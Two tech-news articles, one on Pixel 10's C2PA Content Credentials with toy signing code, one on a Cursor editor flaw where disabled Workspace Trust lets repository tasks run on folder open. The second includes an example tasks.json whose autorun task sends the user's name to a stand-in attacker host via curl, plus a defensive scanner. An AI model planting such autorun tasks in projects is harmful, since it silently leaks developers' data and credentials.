Image by Jonathan Kemper, from Unsplash
Pixel 10 Lets Users Check If Photos Are AI-Made
- Written by Kiara Fabbri, Former Tech News Writer
- Fact-Checked by Sarah Frazier, Former Content Manager
The Made by Google 2025 event brought news about the Pixel 10 lineup, which will be the first to support C2PA Content Credentials directly in Pixel Camera and Google Photos.
In a rush? Here are the quick facts:
- Pixel 10 is first phone with built-in C2PA Content Credentials.
- Credentials prove how and when images were created.
- Pixel Camera achieved C2PA Assurance Level 2 security rating.
According to Google, “The Pixel 10 lineup is the first to have Content Credentials built in across every photo created by Pixel Camera.” These credentials act like a digital signature that proves how and when an image was made, helping people tell the difference between real photos and AI-generated ones.
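Conceptually, the check works like ordinary signature verification: the credential binds a digest of the image to its creation metadata, and any later edit breaks the match. The sketch below is a toy stand-in, not the real C2PA scheme — actual Content Credentials are asymmetric signatures over a structured manifest, backed by X.509 certificates — but the verify flow is the same shape. Here an HMAC with a device-held secret plays the role of the signature.

```python
# Toy stand-in for a content credential: real C2PA uses asymmetric signatures
# over a structured manifest, not a symmetric MAC. The shape of the check is
# the same: bind image digest + metadata, then verify them together.
import hashlib
import hmac
import json

DEVICE_SECRET = b"per-device signing secret (stand-in)"

def make_credential(image_bytes: bytes, metadata: dict) -> str:
    """Bind the image digest and its creation metadata into one signed blob."""
    payload = hashlib.sha256(image_bytes).digest() + json.dumps(metadata, sort_keys=True).encode()
    return hmac.new(DEVICE_SECRET, payload, hashlib.sha256).hexdigest()

def verify_credential(image_bytes: bytes, metadata: dict, credential: str) -> bool:
    """Recompute the binding and compare in constant time."""
    payload = hashlib.sha256(image_bytes).digest() + json.dumps(metadata, sort_keys=True).encode()
    expected = hmac.new(DEVICE_SECRET, payload, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, credential)

photo = b"raw image bytes"
meta = {"tool": "camera", "captured_at": "2025-08-20T10:00:00Z"}
cred = make_credential(photo, meta)

print(verify_credential(photo, meta, cred))         # unmodified photo: True
print(verify_credential(photo + b"x", meta, cred))  # any edit breaks it: False
```

Because the metadata is signed along with the pixels, tampering with either the image or its claimed origin invalidates the credential.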
The Content Credentials system operates under the Coalition for Content Provenance and Authenticity (C2PA), which brings together major companies to create standards for tracking the origin of digital media. Google, a steering-committee member, said this work has become crucial as generative AI makes it harder to distinguish real content from synthetic content.
“Generative AI can help us all to be more creative, productive, and innovative. But it can be hard to tell the difference between content that’s been AI-generated, and content created without AI. The ability to verify the source and history—or provenance—of digital content is more important than ever,” Google explained.
The Pixel 10 system combines the Tensor G5 processor, the Titan M2 security chip, and Android’s hardware security features. The Pixel Camera app received Assurance Level 2, the highest security rating in the C2PA Conformance Program, and Google says this level is “only possible on the Android platform.”
To protect privacy, Google created a “One-and-Done” system that generates a distinct certificate for each image, so multiple photos cannot be traced back to a single person. The phones also maintain offline trusted timestamps, which keep credentials valid even when photos are taken without an internet connection.
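The privacy property can be illustrated with a small toy: Google’s actual scheme issues a fresh certificate per image, whereas this sketch uses a single-use random key per capture. The point it demonstrates is unlinkability — two credentials share no identifier that could connect photos to one device or person.

```python
# Toy illustration of the "One-and-Done" idea only: the real system issues a
# distinct per-image certificate. Here a single-use random key per capture
# stands in, so no identifier recurs across credentials.
import hashlib
import hmac
import secrets

def credential_for(image_bytes: bytes) -> dict:
    one_time_key = secrets.token_bytes(32)  # generated once, never reused
    mac = hmac.new(one_time_key, hashlib.sha256(image_bytes).digest(), hashlib.sha256)
    return {"verifier_key": one_time_key.hex(), "signature": mac.hexdigest()}

a = credential_for(b"photo A")
b = credential_for(b"photo B")
print(a["verifier_key"] != b["verifier_key"])  # True: nothing links the two photos
```

Each credential still verifies its own image, but comparing two credentials reveals nothing about whether they came from the same camera.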
Google plans to expand Content Credentials to more products soon, saying it is “a tangible step toward more media transparency and trust.”

Image by Sigmund, from Unsplash
Cursor AI Code Editor Flaw Lets Hackers Run Code Automatically
- Written by Kiara Fabbri, Former Tech News Writer
- Fact-Checked by Sarah Frazier, Former Content Manager
More than one million developers use Cursor as their AI code editor, but the tool has been found to contain a critical security flaw.
In a rush? Here are the quick facts:
- Cursor AI editor runs malicious code from repos without user consent.
- Workspace Trust is disabled by default in Cursor.
- Cursor refuses to change default settings despite warnings.
According to Oasis Security, the security flaw in Cursor enables attackers to execute malicious repository code automatically as developers open their projects, with no clicks or confirmation required.
Cursor is based on Visual Studio Code (VS Code) but ships with an important security feature, Workspace Trust, turned off by default. As a result, attackers can embed malicious files in project folders that execute automatically the moment a user opens the folder.
That code could steal credentials, API tokens, and configuration files, or even connect to hacker-controlled servers. BleepingComputer noted that because developers’ laptops often store cloud keys and permissions, they create an entry point for attackers to spread into corporate systems.
VS Code itself is not affected because it blocks these automatic runs unless the user explicitly grants trust. To demonstrate the danger, Oasis shared a proof-of-concept showing how a simple task could send a developer’s username to an external server.
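The report does not publish the exact payload, but in the VS Code task schema that Cursor inherits, a folder-open autorun task looks roughly like this (the attacker URL is hypothetical, for illustration only):

```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Build helpers",
      "type": "shell",
      "command": "curl -s https://attacker.example/?u=$(whoami)",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
```

With Workspace Trust enabled, the editor withholds such tasks until the user explicitly trusts the folder; with it disabled, the task runs as soon as the folder is opened.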
Cursor, however, has no plans to change its default settings. The company explained that “Workspace Trust disables AI and other features our users want to use within the product.” Instead, it says it will update security guidance to help users enable Workspace Trust manually if they choose.
For now, Oasis Security advises users to enable Workspace Trust in Cursor, search projects for autorun tasks, and open unknown repositories only inside virtual machines.
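The “search projects for autorun tasks” step can be automated. The helper below is a sketch (names are my own, not from the report) that walks a checkout and flags any `.vscode/tasks.json` declaring a folder-open autorun task, so you can review a repository before opening it in an editor.

```python
# Hedged helper sketch: flag .vscode/tasks.json files that declare
# folder-open autorun tasks ("runOptions": {"runOn": "folderOpen"}).
import json
from pathlib import Path

def find_autorun_tasks(repo_root: str) -> list[Path]:
    flagged = []
    for tasks_file in Path(repo_root).rglob(".vscode/tasks.json"):
        try:
            config = json.loads(tasks_file.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, OSError):
            continue  # unreadable, or JSONC with comments: inspect manually
        for task in config.get("tasks", []):
            if task.get("runOptions", {}).get("runOn") == "folderOpen":
                flagged.append(tasks_file)
                break
    return flagged

# Usage: run against a freshly cloned repository before opening it.
# hits = find_autorun_tasks("/path/to/cloned/repo")
```

Note that real `tasks.json` files often contain comments (JSONC), which the standard `json` parser rejects; the sketch skips those, which is itself a cue to inspect them by hand.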
“This has the potential to leak sensitive credentials, modify files, or serve as a vector for broader system compromise,” Oasis warned.